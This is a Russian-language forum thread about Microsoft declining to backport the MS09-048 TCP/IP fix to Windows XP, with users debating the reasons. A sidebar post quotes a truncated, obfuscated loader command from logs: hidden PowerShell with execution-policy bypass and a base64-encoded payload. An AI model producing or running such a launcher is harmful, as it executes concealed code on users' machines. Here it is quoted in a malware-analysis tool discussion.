Перейти к содержанию
dr_dizel

Microsoft отказывается выпускать патч для Windows XP

Recommended Posts

dr_dizel

Отказ мелкомягких патчить во всех ОС критическую уязвимость в стеке TCP/IP на удалённое выполнение кода или дос вызвало негодование Ктулху.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
AM_Bot

К удивлению специалистов по безопасности, компания Microsoft отказалась выпускать патч для недавно обнаруженной уязвимости TCP/IP в Windows XP и Windows 2000. Один из ведущих менеджеров по безопасности программ Microsoft Эдриан Стоун заявил, что этот фрагмент исходников слишком стар, имеет возраст от 12 до 15 лет, и разобраться в коде на этом уровне «просто нереально» [backporting that level of code is essentially not feasible].читать дальше

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik
Уязвимость затрагивает также Windows Vista, Windows Server 2003 и Windows Server 2008. Для трёх упомянутых систем вышел апдейт MS09-048

Для 2003, значит, разобрались, а для XP нет.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Это такой последний намек тем, кто еще сомневается о переходе на Windows Vista и Windows 7. Пора парни, пора, а то скоро придется патчить винду своими руками :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Сергей Ильин

Давно ли уязвимость в SMB 2.0 закрыли?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
bse
Отказ мелкомягких патчить во всех ОС критическую уязвимость в стеке TCP/IP на удалённое выполнение кода или дос вызвало негодование Ктулху.

Ктулху негодовал на переводчика:

kemko

16 сентября 2009, 16:58

Тьфу, опять похоже не прочитали. Ладно, бесплатно поработаю гидом-экскурсоводом по топику. Итак, основная мысль того вебкаста в том, что сейчас есть исправление для win2k3, win2k8 и vista но нет для XP в том, что код который нужно править в XP совершенно другой и писался 12-15 лет назад. При этом никто не снимает с себя обязательств по выпуску апдейта, просто он выйдет слегка позднее из-за того что это другой код и тут бэкпортом фиксов для win2k3, win 2k8 и vista не обойтись. И это уже не говоря о том, что для XP этот код, в отличии от остальных уязвимых, может вызвать только замедление работы, в то время как для уже пофиксенных ОС мог так же привести к удаленному выполнению кода.

Хотя возможно,

Это такой последний намек тем, кто еще сомневается о переходе на Windows Vista и Windows 7. Пора парни, пора, а то скоро придется патчить винду своими руками

что и такой намек тоже имеет место.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×